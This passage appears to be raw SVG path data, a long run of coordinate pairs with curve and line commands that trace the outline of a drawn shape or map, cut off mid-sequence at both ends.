687.47666,74.693856 689.64705,75.831039 L 692.44125,77.295067 L 690.24252,78.754969 L 688.04379,80.214871 L 690.27189,82.08712 C 691.96428,83.509209 692.19377,84.162285 691.22637,84.803309 C 690.24696,85.452282 690.41478,86.065397 691.95278,87.457271 C 693.05281,88.452783 693.70412,89.669724 693.40014,90.161584 C 693.09615,90.653444 693.88617,91.896988 695.15573,92.925017 L 697.46402,94.794159 L 692.25611,98.031571 C 686.87768,101.37499 686.32261,103 690.55902,103 C 691.90156,103 693,103.50248 693,104.11663 C 693,104.77107 692.09923,104.99771 690.82381,104.66418 C 689.6034,104.34503 687.38356,104.84178 685.76955,105.7952 C 683.26657,107.27375 682.95535,107.95184 683.38147,110.99837 C 684.27409,117.38007 684.82808,118 689.63837,118 C 692.97941,118 694.19518,118.42851 694.60354,119.75 C 695.6719,123.20739 696.73005,124.52274 699.59224,125.95131 L 702.5,127.40263 L 699.75,128.39436 C 695.28558,130.00435 696.33369,131.82943 701.39509,131.25894 C 705.22233,130.82755 705.87704,131.03722 706.46248,132.88177 C 706.84176,134.0768 707.97708,135 709.06739,135 C 710.13032,135 711,135.63017 711,136.40039 C 711,137.36671 712.00737,137.72058 714.25,137.54207 C 716.0375,137.39978 717.9684,137.64661 718.54089,138.09058 C 719.11338,138.53455 721.13838,139.17076 723.04089,139.50438 C 727.20203,140.23407 729.04554,141.73578 727.18885,142.88328 C 726.47692,143.32328 725.97147,144.09204 726.06563,144.59164 C 726.40957,146.41645 725.9789,148 725.13867,148 C 723.95774,148 725.03395,142.67624 726.39903,141.76531 C 727.01669,141.35314 726.40253,141.0212 725,141.00915 C 723.625,140.99734 721.36458,140.39509 719.97683,139.67083 C 718.58909,138.94656 715.97108,138.45662 714.15903,138.58207 C 712.08211,138.72586 710.6651,138.29083 710.3252,137.40508 C 710.02865,136.63229 709.18468,136 708.44972,136 C 707.71475,136 706.46713,135.07731 705.67723,133.94957 C 704.42382,132.16008 703.58941,131.98558 699.12053,132.5784 C 696.30424,132.95199 694,133.65741 694,134.14598 C 694,135.0745 685.19149,134.69133 678.75657,133.48288 C 673.34059,132.46579 669.72662,133.56329 670.49718,135.99112 C 670.91178,137.29741 670.44819,138.32766 669.054,139.19835 C 667.9243,139.90386 667,141.04785 667,141.74055 C 667,142.43325 666.5125,143 665.91667,143 C 664.07788,143 665.49098,145.30442 667.55421,145.67042 C 671.7316,146.41145 677.06982,146.18785 678.25541,145.22219 C 680.17281,143.66046 687.31112,144.6871 688.69854,146.72413 C 691.8115,151.29464 692.97392,151.89556 695.82275,150.40702 C 698.145,149.19363 698.64722,149.2065 699.61024,150.50407 C 700.22088,151.32683 701.68338,152 702.86024,152 C 705.45747,152 705.57369,152.80928 703.25,154.71391 C 702.2875,155.50283 702.06568,155.86142 702.75706,155.51078 C 703.44845,155.16013 704.25849,155.51005 704.55716,156.28837 C 704.90716,157.20046 706.01543,157.52854 707.67486,157.21132 C 709.82271,156.80074 709.98018,156.56841 708.62476,155.80988 C 704.78942,153.66352 707.77642,151.06397 715.94335,149.4406 C 717.83719,149.06416 720.00684,148.13602 720.76478,147.37808 C 721.52272,146.62013 722.63571,146 723.2381,146 C 723.84048,146 724.03724,146.2961 723.67534,146.65799 C 723.31345,147.01989 723.57595,148.00627 724.25868,148.84995 C 725.03162,149.80512 725.0711,150.12698 724.36331,149.70297 C 723.73813,149.32845 722.67053,149.69207 721.99086,150.51101 C 721.3112,151.32995 721.0959,152 721.51241,152 C 721.92893,152 721.07181,152.94228 719.60769,154.09395 L 716.94567,156.1879 L 720.72283,158.19105 C 722.80028,159.29278 726.075,160.62606 728,161.15389 C 737.89666,163.86752 739.70931,164.24688 742.16887,164.11917 C 743.63675,164.04295 745.43851,164.54746 746.1728,165.2403 C 746.90708,165.93313 748.37997,167.175 749.44588,168 C 751.16858,169.33333 751.28793,169.33333 750.52006,168 C 749.93781,166.98897 750.33184,167.0917 751.72883,168.31514 C 754.59909,170.82885 755.54625,168.82821 753.41569,164.75205 C 752.48079,162.96342 751.38653,160.825 750.98399,160 C 750.14975,158.29024 753.45224,153 755.35381,153 C 756.0235,153 756.57143,152.06946 756.57143,150.93214 C 756.57143,149.50521 755.76555,148.70311 753.97139,148.34428 C 751.15539,147.78108 748.42155,144.47553 749.9768,143.51434 C 750.49152,143.19622 750.6636,142.28693 750.3592,141.49367 C 749.5262,139.32291 752.27032,137.01214 754.3194,138.15887 C 755.24373,138.67615 756,138.70988 756,138.23383 C 756,137.75778 757.84201,136.33302 760.09335,135.06769 C 763.52305,133.14009 765.01866,132.87747 769.31835,133.44784 C 772.14076,133.82225 774.94117,134.53621 775.54148,135.03442 C 776.14178,135.53263 777.95303,135.9321 779.56647,135.92211 C 781.17991,135.91213 784.75,135.88243 787.5,135.85612 C 790.25,135.8298 794.18419,136.03879 796.24265,136.32054 C 800.73176,136.93499 802.11827,135.46664 798.57388,133.85171 C 796.30456,132.81774 796.20897,132.56768 797.67361,131.49671 C 798.57486,130.8377 799.39032,129.23872 799.48575,127.94343 C 799.63904,125.86276 800.42854,125.44636 806.26141,124.36983 C 809.8926,123.69965 815.0839,122.90409 817.79764,122.60192 C 820.51137,122.29974 823.95713,121.5866 825.45488,121.01715 C 829.1824,119.59995 834.18994,120.10569 836,122.08216 C 837.74315,123.98556 848.22203,126.59884 849.9152,125.55241 C 850.54767,125.16152 852.37107,124.46717 853.96721,124.00941 C 856.20135,123.36866 856.75259,123.48116 856.36231,124.49821 C 856.07717,125.24128 856.75429,126.10463 857.90988,126.4714 C 859.03987,126.83004 861.3987,129.12069 863.15172,131.56174 C 866.41745,136.10919 867.41756,136.75142 868.50167,134.9973 C 868.91015,134.33636 869.82402,134.37064 871.18286,135.09786 C 872.31667,135.70466 874.57483,135.93503 876.201,135.6098 C 878.43201,135.1636 879.97712,135.6435 882.49658,137.56519 C 884.33298,138.96588 886.88501,140.16634 888.16775,140.23287 C 889.45049,140.2994 891.04091,140.7614 891.70201,141.25954 C 893.07435,142.29358 895.38079,141.68971 902.57596,138.41253 C 907.73574,136.06242 914.85621,135.81036 917.37047,137.88882 C 918.35238,138.70053 924.75909,139.37147 928.86663,139.09274 C 929.70992,139.03551 930.03992,138.26067 929.72838,137.06933 C 929.41644,135.87645 930.0727,134.34087 931.44573,133.05099 C 933.54019,131.08334 933.87687,131.05061 937.30186,132.48166 C 939.30051,133.31675 941.74197,134 942.72733,134 C 943.7127,134 945.11715,134.95794 945.84834,136.12876 C 947.01732,138.00059 947.79572,138.18434 952.29761,137.65116 C 957.39318,137.04766 964.88337,138.50544 966.14905,140.34699 C 967.40811,142.17891 980.81704,141.23865 984.94597,139.02891 C 987.08232,137.88558 995.06233,138.47963 997.88997,139.99249 C 999.93225,141.08517 1003.8488,138.68671 1006.5761,134.67326 C 1008.2557,132.20141 1008.5998,131.02087 1007.7332,130.70274 C 1005.2499,129.79108 1008.8806,127.65676 1014.0408,126.99476 C 1019.8723,126.24666 1026.859,127.71618 1029.3596,130.21676 C 1030.3011,131.15825 1031.009,132.05714 1030.9327,132.21429 C 1030.8564,132.37143 1031.5986,134.1875 1032.5822,136.25 C 1033.7285,138.65396 1035.0573,140 1036.2841,140 C 1039.3747,140 1045.2418,143.20856 1045.7575,145.1808 C 1046.3132,147.30558 1047.4987,147.40684 1053.659,145.85566 C 1058.9743,144.51724 1060.8943,145.93266 1058.135,149.15533 C 1057.2357,150.20556 1056.4967,151.38775 1056.4927,151.78242 C 1056.4722,153.79572 1052.9867,157.20886 1051.5242,156.64767 C 1049.0269,155.68937 1046.2647,157.93363 1046.7589,160.51933 C 1047.0711,162.15229 1047.7071,162.62784 1049.094,162.26517 C 1050.1423,161.99103 1051,162.2296 1051,162.79531 C 1051,164.52597 1055.7695,163.4183 1059.7987,160.75189 C 1064.8388,157.41653 1076.9638,145.11652 1078.1015,142.1849 C 1078.5957,140.9116 1079,138.6042 1079,137.05735 C 1079,135.51049 1079.6323,133.72013 1080.4051,133.07876 C 1082.2498,131.54777 1081.9306,129.91523 1079.2168,127.00237 C 1076.6033,124.19711 1074.3541,123.63493 1073.6005,125.59863 C 1073.051,127.03061 1069.3718,127.46363 1066.6449,126.41724 C 1065.8097,126.09672 1065.359,125.22793 1065.6435,124.48659 C 1066.0009,123.55522 1065.1316,123.03758 1062.8304,122.81145 L 1059.5,122.4842 L 1064.75,119.72525 C 1067.6375,118.20783 1070,116.56033 1070,116.06414 C 1070,115.56794 1073.9328,113.01818 1078.7396,110.398 L 1087.4792,105.63403 L 1097.9896,105.5329 C 1103.7703,105.47727 1108.9573,105.14806 1109.5163,104.80132 C 1110.0752,104.45458 1112.7752,104.63691 1115.5163,105.2065 C 1123.7273,106.91276 1126.8036,106.85923 1127.2893,105.00163 C 1127.5272,104.0921 1130.2526,101.91965 1133.3457,100.17397 C 1137.7986,97.660904 1140.1304,97 1144.5439,97 C 1147.6097,97 1149.8855,97.37624 1149.6013,97.836088 C 1149.3171,98.295937 1146.835,98.476446 1144.0855,98.23722 C 1140.2322,97.90195 1138.4463,98.253229 1136.2932,99.769936 C 1134.7569,100.85216 1132.4875,102.05197 1131.25,102.43619 C 1128.5988,103.25935 1128.3395,104.53257 1130.6431,105.41655 C 1133.4096,106.47815 1131.6404,107.00927 1123.4,107.5909 C 1118.2675,107.95317 1115.9768,107.81505 1116.861,107.19662 C 1117.8545,106.50178 1117.2305,106.12898 1114.5503,105.81608 C 1112.5309,105.58032 1110.7044,105.66932 1110.4914,106.01386 C 1110.2785,106.35839 1104.9868,106.66781 1098.732,106.70144 C 1089.9382,106.74873 1086.5821,107.16124 1083.9299,108.52083 C 1082.0434,109.48786 1080.275,110.57932 1080,110.94631 C 1079.725,111.31329 1078.0375,112.20509 1076.25,112.92809 C 1074.4625,113.65109 1073,114.62894 1073,115.10109 C 1073,115.57324 1070.6375,117.31442 1067.75,118.97039 C 1063.341,121.4989 1062.9085,121.98274 1065.05,121.99062 C 1066.4525,121.99578 1068.14,121.46 1068.8,120.8 C 1069.7333,119.86667 1070.2667,119.86667 1071.2,120.8 C 1072.1333,121.73333 1072.1333,122 1071.2,122 C 1070.54,122 1070,122.675 1070,123.5 C 1070,125.19092 1071.5645,125.51368 1072.4914,124.01396 C 1073.2828,122.73335 1076.3588,123.22292 1078.4558,124.96328 C 1080.5529,126.70376 1085.6929,126.73677 1087.2833,125.01996 C 1088.1578,124.07595 1088.1679,123.89305 1087.3191,124.36961 C 1086.6696,124.73427 1085.8288,124.53202 1085.4507,123.92018 C 1085.0148,123.21486 1085.4469,122.95615 1086.6316,123.21326 C 1087.6592,123.4363 1088.3717,124.20192 1088.2149,124.91465 C 1088.0581,125.62738 1088.3746,126.74639 1088.9181,127.40135 C 1089.4617,128.0563 1089.8374,129.5082 1089.7531,130.6278 C 1089.5552,133.25489 1092.8846,142 1094.0827,142 C 1094.5872,142 1095,142.46583 1095,143.03518 C 1095,143.74876 1094.3991,143.74876 1093.0657,143.03518 C 1089.9457,141.36539 1088.0807,141.83032 1087.4254,144.44127 C 1086.9988,146.14102 1087.4381,147.55387 1088.8718,149.09272 C 1090.0042,150.30831 1090.639,151.77507 1090.2823,152.35219 C 1089.8505,153.05083 1089.5001,153.00022 1089.2336,152.20075 C 1088.6482,150.44473 1086.3157,150.73493 1085.5787,152.65546 C 1084.312,155.9564 1092.2743,161.20121 1095.4943,159.18696 C 1096.0474,158.84095 1097.3052,158.43247 1098.2893,158.27921 C 1099.2734,158.12595 1101.843,157.10043 1103.9995,156.00028 C 1108.2967,153.80801 1109.0128,153.62803 1108.9742,154.75 C 1108.9503,155.44368 1104.0049,157.90134 1099.6462,159.3856 C 1098.5245,159.76759 1098.0175,160.60332 1098.3624,161.50202 C 1098.7882,162.61157 1097.9092,163.1508 1094.8869,163.63408 C 1092.6619,163.98986 1090.3571,165.05661 1089.765,166.00461 C 1088.7668,167.60309 1088.4852,167.61152 1085.8877,166.12075 C 1081.8303,163.79215 1080.6825,165.54965 1083.0742,170.42856 C 1085.474,175.32405 1085.5003,177.49973 1083.1875,179.8125 C 1082.1906,180.80937 1081.5582,182.17451 1081.782,182.84612 C 1082.0059,183.51774 1081.6888,184.67008 1081.0773,185.40687 C 1080.4658,186.14367 1080.2332,187.44403 1080.5603,188.29656 C 1081.1938,189.94753 1077.6538,192.52211 1076.0841,191.55199 C 1075.6031,191.25471 1074.9132,191.78379 1074.551,192.72772 C 1073.9865,194.19872 1073.7594,194.23362 1072.9615,192.97197 C 1072.3638,192.02681 1072.0251,191.93614 1072.0153,192.71862 C 1072.0068,193.39338 1071.3249,193.67816 1070.4873,193.35674 C 1069.6553,193.03747 1068.3053,193.33169 1067.4873,194.01057 C 1066.6693,194.68945 1066,194.86466 1066,194.39994 C 1066,193.93522 1065.3054,194.54668 1064.4564,195.75875 C 1063.1271,197.65666 1062.6232,197.79163 1060.8258,196.73126 C 1059.1655,195.75177 1058.6457,195.75688 1058.2839,196.75623 C 1058.0338,197.44716 1057.3493,197.71591 1056.7629,197.35346 C 1056.1764,196.991 1055.1115,197.49464 1054.3963,198.47265 C 1053.6812,199.45066 1052.4543,200.00457 1051.6699,199.70357 C 1049.9239,199.03358 1048,200.80544 1048,203.08337 C 1048,204.82525 1045.4421,205.99145 1043.2438,205.25183 C 1042.5528,205.01937 1042.213,204.46445 1042.4885,204.01867 C 1042.764,203.57289 1042.3398,201.95609 1041.5459,200.42578 C 1040.0948,197.62875 1040.3637,195.48871 1042.0364,196.52249 C 1042.5304,196.8278 1043.5076,196.16014 1044.2078,195.0388 C 1044.9081,193.91746 1045.8659,193 1046.3362,193 C 1046.8065,193 1048.3972,192.14131 1049.8711,191.09181 C 1051.345,190.0423 1053.6644,189.16933 1055.0254,189.15188 C 1061.6268,189.06723 1062.6429,188.67485 1064.806,185.375 C 1066.0228,183.51875 1067.4908,182 1068.0682,182 C 1068.6456,182 1068.8399,182.45 1068.5,183 C 1067.7915,184.14634 1068.2099,184.24043 1070.3551,183.41724 C 1071.1903,183.09672 1071.6465,182.24224 1071.3687,181.51839 C 1071.0909,180.79454 1071.3443,179.90523 1071.9318,179.54213 C 1072.5193,179.17904 1073,179.42827 1073,180.09597 C 1073,180.85389 1073.743,180.6376 1074.9776,179.52023 C 1076.0654,178.53587 1076.9243,176.77863 1076.8864,175.61524 C 1076.8485,174.45186 1077.05,172.04335 1077.3343,170.263 C 1077.6185,168.48264 1077.4346,166.76859 1076.9255,166.45398 C 1075.4535,165.5442 1075.8521,164 1077.559,164 C 1078.4165,164 1078.8399,163.55 1078.5,163 C 1078.1601,162.45 1078.7782,162 1079.8736,162 C 1080.969,162 1082.1073,161.2125 1082.4032,160.25 C 1083.9515,155.21384 1085.0374,135.67849 1083.8737,133.79566 C 1082.8916,132.20657 1079.8545,134.72211 1080.122,136.90309 C 1080.6057,140.84647 1078.1469,144.76473 1070.1207,152.84083 C 1060.648,162.37234 1055.0888,165.61769 1050.108,164.52372 C 1048.1555,164.09487 1047,164.23532 1047,164.90149 C 1047,165.48471 1045.875,166.24425 1044.5,166.58936 C 1042.7642,167.025 1042,167.90149 1042,169.45653 C 1042,171.10225 1040.9391,172.17463 1038,173.5 C 1035.8,174.49206 1034,175.43536 1034,175.59622 C 1034,175.75708 1035.5729,177.60124 1037.4952,179.69435 C 1040.5928,183.06702 1041.7799,186.41012 1040.977,189.5 C 1040.8341,190.05 1040.7529,191.2875 1040.7964,192.25 C 1040.84,193.2125 1040.4271,194 1039.8788,194 C 1039.3306,194 1039.1827,193.51338 1039.5503,192.91862 C 1040.2663,191.76017 1035.9026,191.97912 1035,193.14694 C 1034.725,193.50276 1033.375,193.95276 1032,194.14694 C 1029.7423,194.46579 1029.5,194.16082 1029.5,191 C 1029.5,189.075 1029.1552,186.96859 1028.7337,186.3191 C 1028.3122,185.6696 1028.4247,184.85554 1028.9837,184.51008 C 1030.769,183.40672 1030.0725,181.74777 1028.0465,182.2776 C 1026.972,182.55857 1025.4178,182.27355 1024.5926,181.64423 C 1022.5322,180.07288 1024.869,176.672 1027.0576,178.05674 C 1028.0543,178.68739 1028.1138,178.97411 1027.25,178.98469 C 1026.5625,178.99311 1026,179.42231 1026,179.93847 C 1026,180.9487 1034.7863,180.54699 1035.845,179.48836 C 1036.1961,179.13726 1035.6996,178.41139 1034.7417,177.87531 C 1031.9317,176.30276 1032.7181,174.43086 1037,172.5 C 1039.5731,171.33969 1041,170.03698 1041,168.84813 C 1041,166.58486 1038.7143,166.4344 1036.9333,168.58041 C 1036.1622,169.5095 1034.6595,169.97689 1033.287,169.71452 C 1032.0029,169.46906 1030.684,169.70231 1030.3561,170.23286 C 1030.0282,170.76341 1028.3514,171.81648 1026.63,172.57301 C 1023.6502,173.88251 1023.6074,173.9792 1025.7388,174.58795 C 1026.9701,174.93964 1027.7476,175.59934 1027.4666,176.05396 C 1027.1857,176.50859 1025.5387,176.38656 1023.8067,175.78279 C 1021.1265,174.84846 1020.0105,175.02835 1016.3107,176.99108 C 1011.2428,179.6796 1009.8754,179.02463 1012.1785,175.01179 C 1013.0809,173.43928 1013.5856,171.91893 1013.2999,171.63323 C 1012.6692,171.00256 1005.9121,174.52412 1005.0375,175.93932 C 1004.6941,176.49491 1003.3315,177.11457 1002.0094,177.31634 C 998.57811,177.83999 998.36028,179.79595 1001.6907,180.17786 C 1003.646,180.40208 1004.4578,181.03196 1004.3611,182.25 C 1004.19,184.40632 1004.9166,184.44714 1007.7792,182.44207 C 1009.0026,181.5852 1010.451,181.16072 1010.998,181.49876 C 1011.545,181.83681 1012.9551,182.29876 1014.1315,182.52533 C 1016.835,183.04598 1017.372,183.58914 1016.5299,184.95157 C 1016.0863,185.66946 1014.8508,185.31786 1012.8761,183.91175 C 1010.0403,181.89252 1009.798,181.87286 1007.9835,183.51492 C 1005.9624,185.34397 1002.8034,184.89256 1003.2407,182.83722 C 1003.3833,182.16708 1002.6,181.43588 1001.5,181.21233 C 998.43884,180.59021 997.52546,179.27671 998.95569,177.55339 C 999.6547,176.71114 1000.5727,176.23593 1000.9958,176.49739 C 1001.4188,176.75884 1002.9013,176.07888 1004.2902,174.98637 C 1005.6791,173.89387 1007.2519,173 1007.7853,173 C 1008.3187,173 1009.2902,172.35523 1009.9443,171.56717 C 1011.3812,169.83576 1014.7568,169.92396 1015.4425,171.71084 C 1015.7146,172.41988 1015.4748,173 1014.9096,173 C 1014.3444,173 1014.1601,173.45 1014.5,174 C 1014.8399,174.55 1014.5665,175 1013.8924,175 C 1013.2182,175 1012.933,175.26631 1013.2585,175.5918 C 1014.4721,176.8054 1030,170.66902 1030,168.97583 C 1030,168.39364 1031.0645,168.22908 1032.5,168.58936 C 1034.0404,168.97597 1035,168.79137 1035,168.10841 C 1035,167.49878 1035.5749,167 1036.2775,167 C 1036.9801,167 1038.6676,166.22021 1040.0275,165.26712 C 1041.3874,164.31404 1043.3528,163.67838 1044.395,163.85455 C 1046.0383,164.13231 1046.2148,163.71108 1045.7235,160.68354 C 1045.1315,157.03579 1046.4035,155.90099 1051.4094,155.61072 C 1053.2463,155.5042 1058.7287,147.39533 1057.6757,146.34235 C 1057.4111,146.07781 1055.4436,146.38602 1053.3034,147.02724 C 1048.8839,148.35136 1044.3969,147.99529 1044.7103,146.34533 C 1045.1831,143.85609 1040.4854,141.49242 1034.25,141.08223 C 1033.5625,141.037 1033,140.4131 1033,139.69578 C 1033,138.97846 1031.6973,136.33741 1030.1051,133.82679 C 1027.783,130.16528 1026.4474,129.10001 1023.3551,128.44327 C 1019.3735,127.59767 1012.9359,127.70949 1009.5871,128.68242 C 1007.7991,129.20189 1007.7883,129.30202 1009.4216,130.21606 C 1011.0482,131.12635 1011.0207,131.33209 1009.0232,133.193 C 1007.8431,134.29248 1006.4662,136.27384 1005.9635,137.59603 C 1005.4261,139.00939 1004.2395,140 1003.0838,140 C 1002.0026,140 1000.8392,140.45122 1000.4983,141.0027 C 1000.0888,141.66532 999.19182,141.63784 997.85367,140.92168 C 995.59728,139.71411 995.70631,139.66242 994.13545,142.68426 C 992.31623,146.18388 992.72439,146.57747 997.86555,146.28111 C 1001.6104,146.06524 1003.3573,146.49322 1005.4498,148.13921 C 1008.3529,150.42276 1007.4624,152.19518 1003.8824,151.25899 C 1001.9078,150.74263 995.94572,152.73741 994.89629,154.26554 C 994.04783,155.50102 987.25428,157.23694 982.5,157.43309 C 978.99486,157.57771 978.53021,157.87458 978.74417,159.83269 C 978.8947,161.21034 978.31949,162.30438 977.24417,162.68562 C 976.28488,163.02573 974.73067,163.9639 973.79038,164.77044 C 972.82354,165.59976 970.21673,166.20463 967.79038,166.16265 C 965.43067,166.12183 961.15916,166.81888 958.29813,167.71166 C 953.4789,169.2155 952.71648,169.21225 947.93329,167.66745 C 945.09366,166.75035 940.45951,165.97318 937.63517,165.94039 C 928.80836,165.83792 923.03353,164.49289 921.39858,162.15866 C 919.17781,158.98808 916.14572,157.62405 910,157.03086 C 904.6894,156.51828 904.51007,156.4043 904.7924,153.72097 C 905.09195,150.87399 904.01864,149.24733 900.5,147.21564 C 898.5,146.06082 898.5,146.06082 900.5,146.06183 C 903.32058,146.06327 906.3369,150.52155 905.57395,153.5614 C 904.99697,155.86026 905.20593,156 909.22044,156 C 914.60728,156 921.42407,158.7768 922.59883,161.44964 C 923.3521,163.1635 924.81293,163.62638 931.5,164.27007 C 935.9,164.69361 941.75,165.49443 944.5,166.04967 C 952.78382,167.72222 955.32547,167.78204 959.27108,166.39731 C 961.34517,165.6694 965.07138,165.11457 967.55153,165.16436 C 970.42026,165.22194 972.71516,164.66276 973.85919,163.62743 C 974.84825,162.73235 976.21111,162 976.88776,162 C 977.56441,162 977.83743,161.54597 977.49447,160.99105 C 977.15151,160.43613 977.16391,159.05893 977.52202,157.93061 C 978.05072,156.26482 978.71614,155.99838 981.06123,156.51345 C 983.77809,157.11017 989.64734,155.82186 993,153.89287 C 997.3341,151.3992 1001.7488,149.9236 1003.75,150.29974 C 1004.9875,150.53234 1006,150.4111 1006,150.03031 C 1006,148.50833 1001.2591,147.03046 997.20467,147.28856 C 991.47866,147.65308 990.30626,146.82854 992.36707,143.88632 C 993.26518,142.60409 994,141.22551 994,140.82281 C 994,139.43058 987.23179,138.80558 985.01319,139.99294 C 979.55246,142.91544 969.76688,143.00638 963.2325,140.19537 C 959.10339,138.41907 956.99883,138.1002 952.72192,138.60286 C 948.33892,139.118 947.04746,138.90461 945.56279,137.41993 C 944.5665,136.42364 941.4456,134.82792 938.62746,133.87388 C 933.94975,132.29032 933.35135,132.27705 931.75532,133.72143 C 930.53219,134.82835 930.31008,135.66869 931.01586,136.51911 C 932.79464,138.66241 929.32512,140.37226 923.71658,140.11634 C 920.8814,139.98698 918.09093,139.49043 917.51554,139.0129 C 916.94016,138.53537 914.48945,137.9172 912.06952,137.63919 C 908.68878,137.25079 906.55747,137.69729 902.86807,139.56685 C 900.2272,140.90508 897.37653,142 896.53324,142 C 894.51368,142 894.59263,142.9623 896.75,144.64221 C 898.37567,145.90809 898.35791,145.95818 896.5,145.34722 C 895.4,144.98549 893.96762,144.27928 893.31692,143.77786 C 891.71851,142.54614 887,145.69871 887,147.99838 C 887,150.01238 884.72989,150.84061 880.18882,150.48339 C 877.76502,150.29272 876.89585,150.71776 876.33369,152.36861 C 875.93451,153.54087 875.72894,155.11952 875.87689,155.87671 C 876.06785,156.85413 875.46972,157.08372 873.81463,156.66832 C 870.38035,155.80637 868.60556,157.29229 869.38067,160.38058 C 869.74987,161.85158 869.4836,163.95577 868.76602,165.23792 C 868.06971,166.48206 867.44839,167.62661 867.38531,167.78136 C 867.32223,167.93611 866.19871,168.26915 864.88861,168.52145 C 863.57851,168.77375 862.35512,169.43464 862.16997,169.99009 C 861.98482,170.54554 860.34398,171 858.52366,171 C 856.40706,171 854.99181,171.57896 854.59767,172.60607 C 854.17366,173.71102 853.2556,174.02998 851.65534,173.62834 C 850.09197,173.23596 848.61228,173.71256 847.14248,175.08189 C 844.90058,177.17054 845.05797,179 847.47956,179 C 848.2284,179 849.14301,180.2375 849.51202,181.75 C 849.88104,183.2625 851.70449,185.77108 853.56414,187.32461 C 856.68094,189.92836 857.20622,190.05488 860.28188,188.94271 C 863.00563,187.95779 864.12821,188.0033 866.39408,189.19051 L 869.16974,190.64483 L 866.51952,193.79443 C 864.49966,196.1949 864.10041,197.35701 864.84096,198.68029 C 865.54832,199.94428 865.38854,200.72662 864.25353,201.55656 C 863.39604,202.18358 863.01897,203.22168 863.41561,203.86345 C 864.4277,205.50106 870.78053,208.02145 872.36429,207.4137 C 873.0877,207.13611 874.25677,207.60446 874.96223,208.45449 C 875.66769,209.30452 876.86479,210 877.62244,210 C 878.3801,210 879,210.525 879,211.16667 C 879,211.80833 879.2867,212.04663 879.63712,211.69621 C 879.98754,211.34579 881.55329,211.96985 883.11657,213.083 C 884.67985,214.19616 886.98064,215.33334 888.22945,215.61008 C 891.78952,216.399 898.53948,216.40265 899.81174,215.61635 C 900.44657,215.224 902.66113,215.24202 904.73299,215.65639 C 910.29878,216.76953 910.21679,216.78459 914,213.95455 C 918.10145,210.88646 923.47677,210.56396 925.45356,213.26737 C 926.16434,214.23942 927.4115,214.77932 928.22502,214.46714 C 930.15542,213.72638 933,218.06056 933,221.74258 C 933,223.33757 932.11561,225.31275 930.95745,226.3044 C 928.53028,228.38262 929.31791,230.35126 932.20939,229.43354 C 933.48838,229.02761 934.01358,229.169 933.61604,229.81225 C 933.26711,230.37683 933.68944,231.54659 934.55457,232.41171 C 935.41969,233.27683 935.88444,234.37797 935.58734,234.85868 C 934.9121,235.95124 938.77318,239.56015 939.66412,238.66921 C 940.02264,238.31069 940.92511,238.52288 941.6696,239.14076 C 942.75058,240.03789 942.97053,239.78436 942.76161,237.88208 C 942.59968,236.4076 942.97626,235.59525 943.75,235.75 C 944.4375,235.8875 945,235.62291 945,235.16203 C 945,234.70115 946.62725,234.26289 948.6161,234.18812 C 950.60496,234.11335 952.76284,233.61179 953.41138,233.07354 C 955.03779,231.72375 961.5,234.06177 961.5,236 C 961.5,237.10492 962.69036,237.51276 966.01938,237.54845 C 968.50504,237.5751 971.08329,237.93344 971.74881,238.34476 C 973.51463,239.43609 981.1917,236.93109 983.38463,234.54803 C 984.64781,233.17534 985.41293,232.89931 985.70495,233.71094 C 986.29351,235.34682 991.80677,234.22613 994.88486,231.84492 C 996.19653,230.83021 997.91059,230 998.69388,230 C 999.47716,230 999.89844,229.64468 999.63004,229.21041 C 999.36164,228.77613 1000.4588,227.53863 1002.0681,226.46041 C 1003.6775,225.38218 1004.9955,223.66476 1004.9971,222.64392 C 1004.9987,221.62308 1006.1293,219.89954 1007.5095,218.81385 C 1008.8898,217.72815 1009.7202,216.35636 1009.355,215.76542 C 1008.9589,215.12445 1009.1615,214.98177 1009.8572,215.41177 C 1010.6064,215.87477 1011.2249,215.12535 1011.5867,213.31628 C 1012.3307,209.59635 1011.8697,208.47014 1009.75,208.82924 C 1007.1213,209.27459 1007.6436,207.30626 1010.3333,206.63119 C 1011.6167,206.30909 1012.6667,205.38531 1012.6667,204.57833 C 1012.6667,203.77136 1012.4042,203.1394 1012.0833,203.17398 C 1009.7039,203.43041 1007.9879,202.82852 1008.5421,201.93183 C 1008.9052,201.34433 1009.8318,201.10521 1010.6012,201.40044 C 1011.3705,201.69568 1012,201.50135 1012,200.96862 C 1012,200.43588 1011.5266,200 1010.948,200 C 1010.3694,200 1009.4318,198.66839 1008.8644,197.04086 C 1008.297,195.41333 1006.9704,193.80801 1005.9164,193.47347 C 1004.8624,193.13894 1004,192.53098 1004,192.12245 C 1004,190.40566 1010.4081,185.00563 1012.3687,185.07029 C 1014.0118,185.12447 1014.1412,185.29626 1012.9336,185.82029 C 1010.5415,186.85833 1006,190.67896 1006,191.65337 C 1006,192.12942 1006.9,193.08097 1008,193.76793 C 1009.1,194.45489 1010,195.70962 1010,196.55622 C 1010,197.40282 1011.0151,199.08651 1012.2557,200.29775 C 1014.8723,202.85231 1015.1208,204.99586 1013,206.7182 C 1011.5716,207.87828 1011.6977,208.08721 1014,208.375 C 1015.337,208.54212 1015.389,208.95234 1014.5549,212.75 C 1014.1623,214.5375 1013.2385,216 1012.5021,216 C 1011.0325,216 1006.6667,222.46236 1006.6667,224.63771 C 1006.6667,225.38697 1006.3996,226 1006.0731,226 C 1005.7467,226 1004.3592,227.02735 1002.9898,228.283 C 998.38973,232.501 991.41225,235.9412 986.5,236.41318 C 985.95,236.46603 984.6,237.01045 983.5,237.62301 C 982.4,238.23557 979.85595,239.03322 977.84655,239.39557 C 975.83715,239.75793 973.92981,240.74053 973.60801,241.57914 C 973.2862,242.41774 973.4206,242.85809 973.90667,242.55768 C 975.31427,241.68774 976.03015,244.79051 975.02923,247.42311 C 974.01607,250.08793 971.18779,251.39303 968.58801,250.3954 C 966.32654,249.52759 966.93076,245.83489 969.54855,244.52503 C 970.95363,243.82197 971.42479,242.87178 971.04855,241.5 C 970.5436,239.65898 969.48417,239.35959 965.21667,239.85194 C 964.51083,239.93337 962.32562,241.60771 960.36064,243.57269 L 956.78795,247.14538 L 958.90312,249.39688 C 960.06647,250.6352 960.83039,251.83999 960.60072,252.07419 C 960.37106,252.30838 961.70456,253.625 963.56405,255 C 965.42354,256.375 966.95733,258.025 966.97247,258.66667 C 966.98761,259.30833 967.50716,260.00239 968.12702,260.20901 C 968.74688,260.41563 969.60392,262.81563 970.03156,265.54234 C 970.94317,271.35505 969.74755,274.61656 965.85735,276.92908 C 964.4039,277.79309 961.11884,279.9625 958.55722,281.75 C 955.9956,283.5375 953.77523,285 953.62306,285 C 953.47089,285 953.55506,283.57821 953.81011,281.84047 C 954.18187,279.30751 953.97032,278.79741 952.74337,279.26824 C 951.18638,279.86571 947,276.27388 947,274.34054 C 